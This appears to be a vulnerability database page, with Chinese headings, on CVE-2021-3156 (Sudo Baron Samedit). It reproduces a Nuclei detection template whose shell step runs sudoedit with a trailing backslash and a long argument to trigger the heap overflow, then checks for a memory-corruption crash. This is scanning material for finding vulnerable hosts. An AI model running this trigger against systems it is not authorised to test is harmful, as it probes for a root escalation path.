CVE-2021-3156: Sudo Baron Samedit - Local Privilege Escalation

日期: 2025-08-01 | 影响软件: Sudo | POC: 已公开

漏洞描述

Sudo before 1.9.5p2 contains an off-by-one error that can result in a heap-based buffer overflow, which allows privilege escalation to root via "sudoedit -s" and a command-line argument that ends with a single backslash character.

PoC代码[已公开]

id: CVE-2021-3156

info:
  name: Sudo Baron Samedit - Local Privilege Escalation
  author: pussycat0x
  severity: high
  description: |
    Sudo before 1.9.5p2 contains an off-by-one error that can result in a heap-based buffer overflow, which allows privilege escalation to root via "sudoedit -s" and a command-line argument that ends with a single backslash character.
  reference:
    - https://medium.com/mii-cybersec/privilege-escalation-cve-2021-3156-new-sudo-vulnerability-4f9e84a9f435
    - https://blog.qualys.com/vulnerabilities-threat-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit
    - https://infosecwriteups.com/baron-samedit-cve-2021-3156-tryhackme-76d7dedc3cff
    - http://packetstormsecurity.com/files/161160/Sudo-Heap-Based-Buffer-Overflow.html
    - http://packetstormsecurity.com/files/176932/glibc-syslog-Heap-Based-Buffer-Overflow.html
  classification:
    cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 7.8
    cve-id: CVE-2021-3156
    cwe-id: CWE-193
    epss-score: 0.92492
    epss-percentile: 0.99727
    cpe: cpe:2.3:a:sudo_project:sudo:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    vendor: sudo_project
    product: sudo
  tags: packetstorm,cve,cve2021,sudo,code,linux,privesc,local,kev,sudo_project

self-contained: true
code:
  - engine:
      - sh
      - bash
    source: |
      sudoedit -s '\' $(python3 -c 'print("A"*1000)')

    matchers:
      - type: word
        words:
          - "malloc(): memory corruption"
          - "Aborted (core dumped)"
        condition: and
# digest: 4a0a00473045022100887a542a30331d337a6d8745abf5ba6391fb4654148db6f662d6c1528c6d191b022033573595f529362ff89955ad4409d462c2cd4523e470dbbfeb89104c3df01297:922c64590222798bb761d5b6d8e72950

相关漏洞推荐